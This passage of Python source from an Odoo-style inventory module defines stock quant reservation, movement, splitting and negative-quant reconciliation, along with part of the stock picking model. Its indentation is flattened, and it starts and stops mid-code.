pull_ids += [r.id for r in route.pull_ids if r.active != vals['active']]
if push_ids:
self.pool.get('stock.location.path').write(cr, uid, push_ids, {'active': vals['active']}, context=context)
if pull_ids:
self.pool.get('procurement.rule').write(cr, uid, pull_ids, {'active': vals['active']}, context=context)
return res
def view_product_ids(self, cr, uid, ids, context=None):
return {
'name': _('Products'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'product.template',
'type': 'ir.actions.act_window',
'domain': [('route_ids', 'in', ids[0])],
}
def view_categ_ids(self, cr, uid, ids, context=None):
return {
'name': _('Product Categories'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'product.category',
'type': 'ir.actions.act_window',
'domain': [('route_ids', 'in', ids[0])],
}
#----------------------------------------------------------
# Quants
#----------------------------------------------------------
class stock_quant(osv.osv):
"""
Quants are the smallest unit of stock physical instances
"""
_name = "stock.quant"
_description = "Quants"
def _get_quant_name(self, cr, uid, ids, name, args, context=None):
""" Forms complete name of location from parent location to child location.
@return: Dictionary of values
"""
res = {}
for q in self.browse(cr, uid, ids, context=context):
res[q.id] = q.product_id.code or ''
if q.lot_id:
res[q.id] = q.lot_id.name
res[q.id] += ': ' + str(q.qty) + q.product_id.uom_id.name
return res
def _calc_inventory_value(self, cr, uid, ids, name, attr, context=None):
context = dict(context or {})
res = {}
uid_company_id = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.id
for quant in self.browse(cr, uid, ids, context=context):
context.pop('force_company', None)
if quant.company_id.id != uid_company_id:
#if the company of the quant is different than the current user company, force the company in the context
#then re-do a browse to read the property fields for the good company.
context['force_company'] = quant.company_id.id
quant = self.browse(cr, uid, quant.id, context=context)
res[quant.id] = self._get_inventory_value(cr, uid, quant, context=context)
return res
def _get_inventory_value(self, cr, uid, quant, context=None):
return quant.product_id.standard_price * quant.qty
_columns = {
'name': fields.function(_get_quant_name, type='char', string='Identifier'),
'product_id': fields.many2one('product.product', 'Product', required=True, ondelete="restrict", readonly=True, select=True),
'location_id': fields.many2one('stock.location', 'Location', required=True, ondelete="restrict", readonly=True, select=True, auto_join=True),
'qty': fields.float('Quantity', required=True, help="Quantity of products in this quant, in the default unit of measure of the product", readonly=True, select=True),
'product_uom_id': fields.related('product_id', 'uom_id', type='many2one', relation="product.uom", string='Unit of Measure', readonly=True),
'package_id': fields.many2one('stock.quant.package', string='Package', help="The package containing this quant", readonly=True, select=True),
'packaging_type_id': fields.related('package_id', 'packaging_id', type='many2one', relation='product.packaging', string='Type of packaging', readonly=True, store=True),
'reservation_id': fields.many2one('stock.move', 'Reserved for Move', help="The move the quant is reserved for", readonly=True, select=True),
'lot_id': fields.many2one('stock.production.lot', 'Lot', readonly=True, select=True, ondelete="restrict"),
'cost': fields.float('Unit Cost'),
'owner_id': fields.many2one('res.partner', 'Owner', help="This is the owner of the quant", readonly=True, select=True),
'create_date': fields.datetime('Creation Date', readonly=True),
'in_date': fields.datetime('Incoming Date', readonly=True, select=True),
'history_ids': fields.many2many('stock.move', 'stock_quant_move_rel', 'quant_id', 'move_id', 'Moves', help='Moves that operate(d) on this quant', copy=False),
'company_id': fields.many2one('res.company', 'Company', help="The company to which the quants belong", required=True, readonly=True, select=True),
'inventory_value': fields.function(_calc_inventory_value, string="Inventory Value", type='float', readonly=True),
# Used for negative quants to reconcile after compensated by a new positive one
'propagated_from_id': fields.many2one('stock.quant', 'Linked Quant', help='The negative quant this is coming from', readonly=True, select=True),
'negative_move_id': fields.many2one('stock.move', 'Move Negative Quant', help='If this is a negative quant, this will be the move that caused this negative quant.', readonly=True),
'negative_dest_location_id': fields.related('negative_move_id', 'location_dest_id', type='many2one', relation='stock.location', string="Negative Destination Location", readonly=True,
help="Technical field used to record the destination location of a move that created a negative quant"),
}
_defaults = {
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.quant', context=c),
}
def init(self, cr):
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('stock_quant_product_location_index',))
if not cr.fetchone():
cr.execute('CREATE INDEX stock_quant_product_location_index ON stock_quant (product_id, location_id, company_id, qty, in_date, reservation_id)')
def read_group(self, cr, uid, domain, fields, groupby, offset=0, limit=None, context=None, orderby=False, lazy=True):
''' Overwrite the read_group in order to sum the function field 'inventory_value' in group by'''
res = super(stock_quant, self).read_group(cr, uid, domain, fields, groupby, offset=offset, limit=limit, context=context, orderby=orderby, lazy=lazy)
if 'inventory_value' in fields:
for line in res:
if '__domain' in line:
lines = self.search(cr, uid, line['__domain'], context=context)
inv_value = 0.0
for line2 in self.browse(cr, uid, lines, context=context):
inv_value += line2.inventory_value
line['inventory_value'] = inv_value
return res
def action_view_quant_history(self, cr, uid, ids, context=None):
'''
This function returns an action that display the history of the quant, which
mean all the stock moves that lead to this quant creation with this quant quantity.
'''
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.get_object_reference(cr, uid, 'stock', 'action_move_form2')
id = result and result[1] or False
result = act_obj.read(cr, uid, [id], context={})[0]
move_ids = []
for quant in self.browse(cr, uid, ids, context=context):
move_ids += [move.id for move in quant.history_ids]
result['domain'] = "[('id','in',[" + ','.join(map(str, move_ids)) + "])]"
return result
def quants_reserve(self, cr, uid, quants, move, link=False, context=None):
'''This function reserves quants for the given move (and optionally given link). If the total of quantity reserved is enough, the move's state
is also set to 'assigned'
:param quants: list of tuple(quant browse record or None, qty to reserve). If None is given as first tuple element, the item will be ignored. Negative quants should not be received as argument
:param move: browse record
:param link: browse record (stock.move.operation.link)
'''
toreserve = []
reserved_availability = move.reserved_availability
#split quants if needed
for quant, qty in quants:
if qty <= 0.0 or (quant and quant.qty <= 0.0):
raise UserError(_('You can not reserve a negative quantity or a negative quant.'))
if not quant:
continue
self._quant_split(cr, uid, quant, qty, context=context)
toreserve.append(quant.id)
reserved_availability += quant.qty
#reserve quants
if toreserve:
self.write(cr, SUPERUSER_ID, toreserve, {'reservation_id': move.id}, context=context)
#check if move'state needs to be set as 'assigned'
rounding = move.product_id.uom_id.rounding
if float_compare(reserved_availability, move.product_qty, precision_rounding=rounding) == 0 and move.state in ('confirmed', 'waiting') :
self.pool.get('stock.move').write(cr, uid, [move.id], {'state': 'assigned'}, context=context)
elif float_compare(reserved_availability, 0, precision_rounding=rounding) > 0 and not move.partially_available:
self.pool.get('stock.move').write(cr, uid, [move.id], {'partially_available': True}, context=context)
def quants_move(self, cr, uid, quants, move, location_to, location_from=False, lot_id=False, owner_id=False, src_package_id=False, dest_package_id=False, entire_pack=False, context=None):
"""Moves all given stock.quant in the given destination location. Unreserve from current move.
:param quants: list of tuple(browse record(stock.quant) or None, quantity to move)
:param move: browse record (stock.move)
:param location_to: browse record (stock.location) depicting where the quants have to be moved
:param location_from: optional browse record (stock.location) explaining where the quant has to be taken (may differ from the move source location in case a removal strategy applied). This parameter is only used to pass to _quant_create if a negative quant must be created
:param lot_id: ID of the lot that must be set on the quants to move
:param owner_id: ID of the partner that must own the quants to move
:param src_package_id: ID of the package that contains the quants to move
:param dest_package_id: ID of the package that must be set on the moved quant
"""
quants_reconcile = []
to_move_quants = []
self._check_location(cr, uid, location_to, context=context)
check_lot = False
for quant, qty in quants:
if not quant:
#If quant is None, we will create a quant to move (and potentially a negative counterpart too)
quant = self._quant_create(cr, uid, qty, move, lot_id=lot_id, owner_id=owner_id, src_package_id=src_package_id, dest_package_id=dest_package_id, force_location_from=location_from, force_location_to=location_to, context=context)
check_lot = True
else:
self._quant_split(cr, uid, quant, qty, context=context)
to_move_quants.append(quant)
quants_reconcile.append(quant)
if to_move_quants:
to_recompute_move_ids = [x.reservation_id.id for x in to_move_quants if x.reservation_id and x.reservation_id.id != move.id]
self.move_quants_write(cr, uid, to_move_quants, move, location_to, dest_package_id, lot_id=lot_id, entire_pack=entire_pack, context=context)
self.pool.get('stock.move').recalculate_move_state(cr, uid, to_recompute_move_ids, context=context)
if location_to.usage == 'internal':
# Do manual search for quant to avoid full table scan (order by id)
cr.execute("""
SELECT 0 FROM stock_quant, stock_location WHERE product_id = %s AND stock_location.id = stock_quant.location_id AND
((stock_location.parent_left >= %s AND stock_location.parent_left < %s) OR stock_location.id = %s) AND qty < 0.0 LIMIT 1
""", (move.product_id.id, location_to.parent_left, location_to.parent_right, location_to.id))
if cr.fetchone():
for quant in quants_reconcile:
self._quant_reconcile_negative(cr, uid, quant, move, context=context)
# In case of serial tracking, check if the product does not exist somewhere internally already
# Checking that a positive quant already exists in an internal location is too restrictive.
# Indeed, if a warehouse is configured with several steps (e.g. "Pick + Pack + Ship") and
# one step is forced (creates a quant of qty = -1.0), it is not possible afterwards to
# correct the inventory unless the product leaves the stock.
picking_type = move.picking_id and move.picking_id.picking_type_id or False
if check_lot and lot_id and move.product_id.tracking == 'serial' and (not picking_type or (picking_type.use_create_lots or picking_type.use_existing_lots)):
other_quants = self.search(cr, uid, [('product_id', '=', move.product_id.id), ('lot_id', '=', lot_id),
('location_id.usage', '=', 'internal')], context=context)
if other_quants:
# We raise an error if:
# - the total quantity is strictly larger than 1.0
# - there are more than one negative quant, to avoid situations where the user would
# force the quantity at several steps of the process
other_quants = self.browse(cr, uid, other_quants, context=context)
if sum(other_quants.mapped('qty')) > 1.0 or len([q for q in other_quants.mapped('qty') if q < 0]) > 1:
lot_name = self.pool['stock.production.lot'].browse(cr, uid, lot_id, context=context).name
raise UserError(_('The serial number %s is already in stock.') % lot_name + _("Otherwise make sure the right stock/owner is set."))
def move_quants_write(self, cr, uid, quants, move, location_dest_id, dest_package_id, lot_id = False, entire_pack=False, context=None):
context=context or {}
vals = {'location_id': location_dest_id.id,
'history_ids': [(4, move.id)],
'reservation_id': False}
if lot_id and any(x.id for x in quants if not x.lot_id.id):
vals['lot_id'] = lot_id
if not entire_pack:
vals.update({'package_id': dest_package_id})
self.write(cr, SUPERUSER_ID, [q.id for q in quants], vals, context=context)
def quants_get_preferred_domain(self, cr, uid, qty, move, ops=False, lot_id=False, domain=None, preferred_domain_list=[], context=None):
''' This function tries to find quants for the given domain and move/ops, by trying to first limit
the choice on the quants that match the first item of preferred_domain_list as well. But if the qty requested is not reached
it tries to find the remaining quantity by looping on the preferred_domain_list (tries with the second item and so on).
Make sure the quants aren't found twice => all the domains of preferred_domain_list should be orthogonal
'''
context = context or {}
domain = domain or [('qty', '>', 0.0)]
domain = list(domain)
quants = [(None, qty)]
if ops:
restrict_lot_id = lot_id
location = ops.location_id
if ops.owner_id:
domain += [('owner_id', '=', ops.owner_id.id)]
if ops.package_id and not ops.product_id:
domain += [('package_id', 'child_of', ops.package_id.id)]
elif ops.package_id and ops.product_id:
domain += [('package_id', '=', ops.package_id.id)]
else:
domain += [('package_id', '=', False)]
domain += [('location_id', '=', ops.location_id.id)]
else:
restrict_lot_id = move.restrict_lot_id.id
location = move.location_id
if move.restrict_partner_id:
domain += [('owner_id', '=', move.restrict_partner_id.id)]
domain += [('location_id', 'child_of', move.location_id.id)]
if context.get('force_company'):
domain += [('company_id', '=', context.get('force_company'))]
else:
domain += [('company_id', '=', move.company_id.id)]
removal_strategy = self.pool.get('stock.location').get_removal_strategy(cr, uid, qty, move, ops=ops, context=context)
product = move.product_id
domain += [('product_id', '=', move.product_id.id)]
#don't look for quants in location that are of type production, supplier or inventory.
if location.usage in ['inventory', 'production', 'supplier']:
return quants
res_qty = qty
if restrict_lot_id:
if not preferred_domain_list:
preferred_domain_list = [[('lot_id', '=', restrict_lot_id)], [('lot_id', '=', False)]]
else:
lot_list = []
no_lot_list = []
for pref_domain in preferred_domain_list:
pref_lot_domain = pref_domain + [('lot_id', '=', restrict_lot_id)]
pref_no_lot_domain = pref_domain + [('lot_id', '=', False)]
lot_list.append(pref_lot_domain)
no_lot_list.append(pref_no_lot_domain)
preferred_domain_list = lot_list + no_lot_list
if not preferred_domain_list:
return self.quants_get(cr, uid, qty, move, ops=ops, domain=domain, removal_strategy=removal_strategy, context=context)
for preferred_domain in preferred_domain_list:
res_qty_cmp = float_compare(res_qty, 0, precision_rounding=product.uom_id.rounding)
if res_qty_cmp > 0:
#try to replace the last tuple (None, res_qty) with something that wasn't chosen at first because of the preferred order
quants.pop()
tmp_quants = self.quants_get(cr, uid, res_qty, move, ops=ops, domain=domain + preferred_domain,
removal_strategy=removal_strategy, context=context)
for quant in tmp_quants:
if quant[0]:
res_qty -= quant[1]
quants += tmp_quants
return quants
def quants_get(self, cr, uid, qty, move, ops=False, domain=None, removal_strategy='fifo', context=None):
"""
Use the removal strategies of product to search for the correct quants
If you inherit, put the super at the end of your method.
:location: browse record of the parent location where the quants have to be found
:product: browse record of the product to find
:qty in UoM of product
"""
domain = domain or [('qty', '>', 0.0)]
return self.apply_removal_strategy(cr, uid, qty, move, ops=ops, domain=domain, removal_strategy=removal_strategy, context=context)
def apply_removal_strategy(self, cr, uid, quantity, move, ops=False, domain=None, removal_strategy='fifo', context=None):
if removal_strategy == 'fifo':
order = 'in_date, id'
return self._quants_get_order(cr, uid, quantity, move, ops=ops, domain=domain, orderby=order, context=context)
elif removal_strategy == 'lifo':
order = 'in_date desc, id desc'
return self._quants_get_order(cr, uid, quantity, move, ops=ops, domain=domain, orderby=order, context=context)
raise UserError(_('Removal strategy %s not implemented.') % (removal_strategy,))
def _quant_create(self, cr, uid, qty, move, lot_id=False, owner_id=False, src_package_id=False, dest_package_id=False,
force_location_from=False, force_location_to=False, context=None):
'''Create a quant in the destination location and create a negative quant in the source location if it's an internal location.
'''
if context is None:
context = {}
price_unit = self.pool.get('stock.move').get_price_unit(cr, uid, move, context=context)
location = force_location_to or move.location_dest_id
rounding = move.product_id.uom_id.rounding
vals = {
'product_id': move.product_id.id,
'location_id': location.id,
'qty': float_round(qty, precision_rounding=rounding),
'cost': price_unit,
'history_ids': [(4, move.id)],
'in_date': datetime.now().strftime(DEFAULT_SERVER_DATETIME_FORMAT),
'company_id': move.company_id.id,
'lot_id': lot_id,
'owner_id': owner_id,
'package_id': dest_package_id,
}
if move.location_id.usage == 'internal':
#if we were trying to move something from an internal location and reach here (quant creation),
#it means that a negative quant has to be created as well.
negative_vals = vals.copy()
negative_vals['location_id'] = force_location_from and force_location_from.id or move.location_id.id
negative_vals['qty'] = float_round(-qty, precision_rounding=rounding)
negative_vals['cost'] = price_unit
negative_vals['negative_move_id'] = move.id
negative_vals['package_id'] = src_package_id
negative_quant_id = self.create(cr, SUPERUSER_ID, negative_vals, context=context)
vals.update({'propagated_from_id': negative_quant_id})
picking_type = move.picking_id and move.picking_id.picking_type_id or False
if lot_id and move.product_id.tracking == 'serial' and (not picking_type or (picking_type.use_create_lots or picking_type.use_existing_lots)):
if qty != 1.0:
raise UserError(_('You should only receive by the piece with the same serial number'))
#create the quant as superuser, because we want to restrict the creation of quant manually: we should always use this method to create quants
quant_id = self.create(cr, SUPERUSER_ID, vals, context=context)
return self.browse(cr, uid, quant_id, context=context)
def _quant_split(self, cr, uid, quant, qty, context=None):
context = context or {}
rounding = quant.product_id.uom_id.rounding
if float_compare(abs(quant.qty), abs(qty), precision_rounding=rounding) <= 0: # if quant <= qty in abs, take it entirely
return False
qty_round = float_round(qty, precision_rounding=rounding)
new_qty_round = float_round(quant.qty - qty, precision_rounding=rounding)
# Fetch the history_ids manually as it will not do a join with the stock moves then (=> a lot faster)
cr.execute("""SELECT move_id FROM stock_quant_move_rel WHERE quant_id = %s""", (quant.id,))
res = cr.fetchall()
new_quant = self.copy(cr, SUPERUSER_ID, quant.id, default={'qty': new_qty_round, 'history_ids': [(4, x[0]) for x in res]}, context=context)
self.write(cr, SUPERUSER_ID, quant.id, {'qty': qty_round}, context=context)
return self.browse(cr, uid, new_quant, context=context)
def _get_latest_move(self, cr, uid, quant, context=None):
move = False
for m in quant.history_ids:
if not move or m.date > move.date:
move = m
return move
@api.cr_uid_ids_context
def _quants_merge(self, cr, uid, solved_quant_ids, solving_quant, context=None):
path = []
for move in solving_quant.history_ids:
path.append((4, move.id))
self.write(cr, SUPERUSER_ID, solved_quant_ids, {'history_ids': path}, context=context)
def _search_quants_to_reconcile(self, cr, uid, quant, context=None):
"""
Searches negative quants to reconcile for where the quant to reconcile is put
"""
dom = [('qty', '<', 0)]
order = 'in_date'
dom += [('location_id', 'child_of', quant.location_id.id), ('product_id', '=', quant.product_id.id),
('owner_id', '=', quant.owner_id.id)]
if quant.package_id.id:
dom += [('package_id', '=', quant.package_id.id)]
if quant.lot_id:
dom += ['|', ('lot_id', '=', False), ('lot_id', '=', quant.lot_id.id)]
order = 'lot_id, in_date'
# Do not let the quant eat itself, or it will kill its history (e.g. returns / Stock -> Stock)
dom += [('id', '!=', quant.propagated_from_id.id)]
quants_search = self.search(cr, uid, dom, order=order, context=context)
product = quant.product_id
quants = []
quantity = quant.qty
for quant in self.browse(cr, uid, quants_search, context=context):
rounding = product.uom_id.rounding
if float_compare(quantity, abs(quant.qty), precision_rounding=rounding) >= 0:
quants += [(quant, abs(quant.qty))]
quantity -= abs(quant.qty)
elif float_compare(quantity, 0.0, precision_rounding=rounding) != 0:
quants += [(quant, quantity)]
quantity = 0
break
return quants
def _quant_reconcile_negative(self, cr, uid, quant, move, context=None):
"""
When new quant arrive in a location, try to reconcile it with
negative quants. If it's possible, apply the cost of the new
quant to the counterpart of the negative quant.
"""
context = context or {}
context = dict(context)
context.update({'force_unlink': True})
solving_quant = quant
quants = self._search_quants_to_reconcile(cr, uid, quant, context=context)
product_uom_rounding = quant.product_id.uom_id.rounding
for quant_neg, qty in quants:
if not quant_neg or not solving_quant:
continue
to_solve_quant_ids = self.search(cr, uid, [('propagated_from_id', '=', quant_neg.id)], context=context)
if not to_solve_quant_ids:
continue
solving_qty = qty
solved_quant_ids = []
for to_solve_quant in self.browse(cr, uid, to_solve_quant_ids, context=context):
if float_compare(solving_qty, 0, precision_rounding=product_uom_rounding) <= 0:
continue
solved_quant_ids.append(to_solve_quant.id)
self._quant_split(cr, uid, to_solve_quant, min(solving_qty, to_solve_quant.qty), context=context)
solving_qty -= min(solving_qty, to_solve_quant.qty)
remaining_solving_quant = self._quant_split(cr, uid, solving_quant, qty, context=context)
remaining_neg_quant = self._quant_split(cr, uid, quant_neg, -qty, context=context)
#if the reconciliation was not complete, we need to link together the remaining parts
if remaining_neg_quant:
remaining_to_solve_quant_ids = self.search(cr, uid, [('propagated_from_id', '=', quant_neg.id), ('id', 'not in', solved_quant_ids)], context=context)
if remaining_to_solve_quant_ids:
self.write(cr, SUPERUSER_ID, remaining_to_solve_quant_ids, {'propagated_from_id': remaining_neg_quant.id}, context=context)
if solving_quant.propagated_from_id and solved_quant_ids:
self.write(cr, SUPERUSER_ID, solved_quant_ids, {'propagated_from_id': solving_quant.propagated_from_id.id}, context=context)
#delete the reconciled quants, as it is replaced by the solved quants
self.unlink(cr, SUPERUSER_ID, [quant_neg.id], context=context)
if solved_quant_ids:
#price update + accounting entries adjustments
self._price_update(cr, uid, solved_quant_ids, solving_quant.cost, context=context)
#merge history (and cost?)
self._quants_merge(cr, uid, solved_quant_ids, solving_quant, context=context)
self.unlink(cr, SUPERUSER_ID, [solving_quant.id], context=context)
solving_quant = remaining_solving_quant
def _price_update(self, cr, uid, ids, newprice, context=None):
self.write(cr, SUPERUSER_ID, ids, {'cost': newprice}, context=context)
def quants_unreserve(self, cr, uid, move, context=None):
related_quants = [x.id for x in move.reserved_quant_ids]
if related_quants:
#if move has a picking_id, write on that picking that pack_operation might have changed and need to be recomputed
if move.partially_available:
self.pool.get("stock.move").write(cr, uid, [move.id], {'partially_available': False}, context=context)
self.write(cr, SUPERUSER_ID, related_quants, {'reservation_id': False}, context=context)
def _quants_get_order(self, cr, uid, quantity, move, ops=False, domain=[], orderby='in_date', context=None):
''' Implementation of removal strategies
If it can not reserve, it will return a tuple (None, qty)
'''
if context is None:
context = {}
product = move.product_id
res = []
offset = 0
while float_compare(quantity, 0, precision_rounding=product.uom_id.rounding) > 0:
quants = self.search(cr, uid, domain, order=orderby, limit=10, offset=offset, context=context)
if not quants:
res.append((None, quantity))
break
for quant in self.browse(cr, uid, quants, context=context):
rounding = product.uom_id.rounding
if float_compare(quantity, abs(quant.qty), precision_rounding=rounding) >= 0:
res += [(quant, abs(quant.qty))]
quantity -= abs(quant.qty)
elif float_compare(quantity, 0.0, precision_rounding=rounding) != 0:
res += [(quant, quantity)]
quantity = 0
break
offset += 10
return res
def _check_location(self, cr, uid, location, context=None):
if location.usage == 'view':
raise UserError(_('You cannot move to a location of type view %s.') % (location.name))
return True
def unlink(self, cr, uid, ids, context=None):
context = context or {}
if not context.get('force_unlink'):
raise UserError(_('Under no circumstances should you delete or change quants yourselves!'))
super(stock_quant, self).unlink(cr, uid, ids, context=context)
#----------------------------------------------------------
# Stock Picking
#----------------------------------------------------------
class stock_picking(models.Model):
_name = "stock.picking"
_inherit = ['mail.thread']
_description = "Transfer"
_order = "priority desc, date asc, id desc"
def _set_min_date(self, cr, uid, id, field, value, arg, context=None):
move_obj = self.pool.get("stock.move")
if value:
move_ids = [move.id for move in self.browse(cr, uid, id, context=context).move_lines]
move_obj.write(cr, uid, move_ids, {'date_expected': value}, context=context)
def _set_priority(self, cr, uid, id, field, value, arg, context=None):
move_obj = self.pool.get("stock.move")
if value:
move_ids = [move.id for move in self.browse(cr, uid, id, context=context).move_lines]
move_obj.write(cr, uid, move_ids, {'priority': value}, context=context)
def get_min_max_date(self, cr, uid, ids, field_name, arg, context=None):
""" Finds minimum and maximum dates for picking.
@return: Dictionary of values
"""
res = {}
for id in ids:
res[id] = {'min_date': False, 'max_date': False, 'priority': '1'}
if not ids:
return res
cr.execute("""select
picking_id,
min(date_expected),
max(date_expected),
max(priority)
from
stock_move
where
picking_id IN %s
group by
picking_id""", (tuple(ids),))
for pick, dt1, dt2, prio in cr.fetchall():
res[pick]['min_date'] = dt1
res[pick]['max_date'] = dt2
res[pick]['priority'] = prio
return res
def create(self, cr, user, vals, context=None):
context = context or {}
if ('name' not in vals) or (vals.get('name') in ('/', False)):
ptype_id = vals.get('picking_type_id', context.get('default_picking_type_id', False))
sequence_id = self.pool.get('stock.picking.type').browse(cr, user, ptype_id, context=context).sequence_id.id
vals['name'] = self.pool.get('ir.sequence').next_by_id(cr, user, sequence_id, context=context)
# As the on_change in one2many list is WIP, we will overwrite the locations on the stock moves here
# As it is a create the format will be a list of (0, 0, dict)
if vals.get('move_lines') and vals.get('location_id') and vals.get('location_dest_id'):
for move in vals['move_lines']:
if len(move) == 3:
move[2]['location_id'] = vals['location_id']
move[2]['location_dest_id'] = vals['location_dest_id']
return super(stock_picking, self).create(cr, user, vals, context)
def write(self, cr, uid, ids, vals, context=None):
res = super(stock_picking, self).write(cr, uid, ids, vals, context=context)
after_vals = {}
if vals.get('location_id'):
after_vals['location_id'] = vals['location_id']
if vals.get('location_dest_id'):
after_vals['location_dest_id'] = vals['location_dest_id']
# Change locations of moves if those of the picking change
if after_vals:
moves = []
for pick in self.browse(cr, uid, ids, context=context):
moves += [x.id for x in pick.move_lines if not x.scrapped]
if moves:
self.pool['stock.move'].write(cr, uid, moves, after_vals, context=context)
return res
def _state_get(self, cr, uid, ids, field_name, arg, context=None):
'''The state of a picking depends on the state of its related stock.move
draft: the picking has no line or any one of the lines is draft
done, draft, cancel: all lines are done / draft / cancel
confirmed, waiting, assigned, partially_available depends on move_type (all at once or partial)
'''
res = {}
for pick in self.browse(cr, uid, ids, context=context):
if not pick.move_lines:
res[pick.id] = pick.launch_pack_operations and 'assigned' or 'draft'
continue
if any([x.state == 'draft' for x in pick.move_lines]):
res[pick.id] = 'draft'
continue
if all([x.state == 'cancel' for x in pick.move_lines]):
res[pick.id] = 'cancel'
continue
if all([x.state in ('cancel', 'done') for x in pick.move_lines]):
res[pick.id] = 'done'
continue
order = {'confirmed': 0, 'waiting': 1, 'assigned': 2}
order_inv = {0: 'confirmed', 1: 'waiting', 2: 'assigned'}
lst = [order[x.state] for x in pick.move_lines if x.state not in ('cancel', 'done')]
if pick.move_type == 'one':
res[pick.id] = order_inv[min(lst)]
else:
#we are in the case of partial delivery, so if all move are assigned, picking
#should be assign too, else if one of the move is assigned, or partially available, picking should be
#in partially available state, otherwise, picking is in waiting or confirmed state
res[pick.id] = order_inv[max(lst)]
if not all(x == 2 for x in lst):
if any(x == 2 for x in lst):
res[pick.id] = 'partially_available'
else:
#if all moves aren't assigned, check if we have one product partially available
for move in pick.move_lines:
if move.partially_available:
res[pick.id] = 'partially_available'
break
return res
def _get_pickings(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id:
res.add(move.picking_id.id)
return list(res)
def _get_pickings_dates_priority(self, cr, uid, ids, context=None):
res = set()
for move in self.browse(cr, uid, ids, context=context):
if move.picking_id and (not (move.picking_id.min_date < move.date_expected < move.picking_id.max_date) or move.priority > move.picking_id.priority):
res.add(move.picking_id.id)
return list(res)
def _get_pack_operation_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pick in self.browse(cr, uid, ids, context=context):
res[pick.id] = False
if pick.pack_operation_ids:
res[pick.id] = True
return res
def _get_quant_reserved_exist(self, cr, uid, ids, field_name, arg, context=None):
res = {}
for pick in self.browse(cr, uid, ids, context=context):
res[pick.id] = False
for move in pick.move_lines:
if move.reserved_quant_ids:
res[pick.id] = True
continue
return res
def action_assign_owner(self, cr, uid, ids, context=None):
for picking in self.browse(cr, uid, ids, context=context):
packop_ids = [op.id for op in picking.pack_operation_ids]
self.pool.get('stock.pack.operation').write(cr, uid, packop_ids, {'owner_id': picking.owner_id.id}, context=context)
def onchange_picking_type(self, cr, uid, ids, picking_type_id, partner_id, context=None):
res = {}
if picking_type_id:
picking_type = self.pool['stock.picking.type'].browse(cr, uid, picking_type_id, context=context)
if not picking_type.default_location_src_id:
if partner_id:
partner = self.pool['res.partner'].browse(cr, uid, partner_id, context=context)
location_id = partner.property_stock_supplier.id
else:
customerloc, supplierloc = self.pool['stock.warehouse']._get_partner_locations(cr, uid, [], context=context)
location_id = supplierloc.id
else:
location_id = picking_type.default_location_src_id.id
if not picking_type.default_location_dest_id:
if partner_id:
partner = self.pool['res.partner'].browse(cr, uid, partner_id, context=context)
location_dest_id = partner.property_stock_customer.id
else:
customerloc, supplierloc = self.pool['stock.warehouse']._get_partner_locations(cr, uid, [], context=context)
location_dest_id = customerloc.id
else:
location_dest_id = picking_type.default_location_dest_id.id
res['value'] = {'location_id': location_id,
'location_dest_id': location_dest_id,
'picking_type_code': picking_type.code,}
return res
def _default_location_destination(self):
# retrieve picking type from context; if none this returns an empty recordset
picking_type_id = self._context.get('default_picking_type_id')
picking_type = self.env['stock.picking.type'].browse(picking_type_id)
return picking_type.default_location_dest_id
def _default_location_source(self):
# retrieve picking type from context; if none this returns an empty recordset
picking_type_id = self._context.get('default_picking_type_id')
picking_type = self.env['stock.picking.type'].browse(picking_type_id)
return picking_type.default_location_src_id
@api.model
def default_get(self, fields):
res = super(stock_picking, self).default_get(fields)
if self._context.get('default_picking_type_id') and 'picking_type_id' in fields:
picking_type = self.env['stock.picking.type'].browse(res['picking_type_id'])
res['picking_type_code'] = picking_type.code
return res
_columns = {
'name': fields.char('Reference', select=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, copy=False),
'origin': fields.char('Source Document', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="Reference of the document", select=True),
'backorder_id': fields.many2one('stock.picking', 'Back Order of', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="If this shipment was split, then this field links to the shipment which contains the already processed part.", select=True, copy=False),
'note': fields.text('Notes'),
'move_type': fields.selection([('direct', 'Partial'), ('one', 'All at once')], 'Delivery Method', required=True, states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, help="It specifies goods to be deliver partially or all at once"),
'state': fields.function(_state_get, type="selection", copy=False,
store={
'stock.picking': (lambda self, cr, uid, ids, ctx: ids, ['move_type', 'launch_pack_operations'], 20),
'stock.move': (_get_pickings, ['state', 'picking_id', 'partially_available'], 20)},
selection=[
('draft', 'Draft'),
('cancel', 'Cancelled'),
('waiting', 'Waiting Another Operation'),
('confirmed', 'Waiting Availability'),
('partially_available', 'Partially Available'),
('assigned', 'Available'),
('done', 'Done'),
], string='Status', readonly=True, select=True, track_visibility='onchange',
help="""
* Draft: not confirmed yet and will not be scheduled until confirmed\n
* Waiting Another Operation: waiting for another move to proceed before it becomes automatically available (e.g. in Make-To-Order flows)\n
* Waiting Availability: still waiting for the availability of products\n
* Partially Available: some products are available and reserved\n
* Ready to Transfer: products reserved, simply waiting for confirmation.\n
* Transferred: has been processed, can't be modified or cancelled anymore\n
* Cancelled: has been cancelled, can't be confirmed anymore"""
),
'location_id': fields.many2one('stock.location', required=True, string="Source Location Zone",
default=_default_location_source, readonly=True, states={'draft': [('readonly', False)]}),
'location_dest_id': fields.many2one('stock.location', required=True,string="Destination Location Zone",
default=_default_location_destination, readonly=True, states={'draft': [('readonly', False)]}),
'move_lines': fields.one2many('stock.move', 'picking_id', string="Stock Moves", copy=True),
'move_lines_related': fields.related('move_lines', type='one2many', relation='stock.move', string="Move Lines"),
'picking_type_id': fields.many2one('stock.picking.type', 'Picking Type', states={'done': [('readonly', True)], 'cancel': [('readonly', True)]}, required=True),
'picking_type_code': fields.related('picking_type_id', 'code', type='selection', selection=[('incoming', 'Suppliers'), ('outgoing', 'Customers'), ('internal', 'Internal')]),
'picking_type_entire_packs': fields.related('picking_type_id', 'show_entire_packs', type='boolean'),
'priority': fields.function(get_min_max_date, multi="min_max_date", fnct_inv=_set_priority, type='selection', selection=procurement.PROCUREMENT_PRIORITIES, string='Priority',
